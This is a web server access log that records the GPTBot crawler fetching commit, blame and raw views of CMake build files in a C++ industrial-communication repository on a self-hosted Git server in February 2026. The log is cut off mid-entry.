"/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11549] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7647] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" -[17/Feb/2026:16:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7644] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" -[17/Feb/2026:16:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8497] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=open" -[17/Feb/2026:16:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11851] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12165] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11367] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11370] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:16:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12082] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12079] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10026] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10360] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10361] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11323] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11309] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 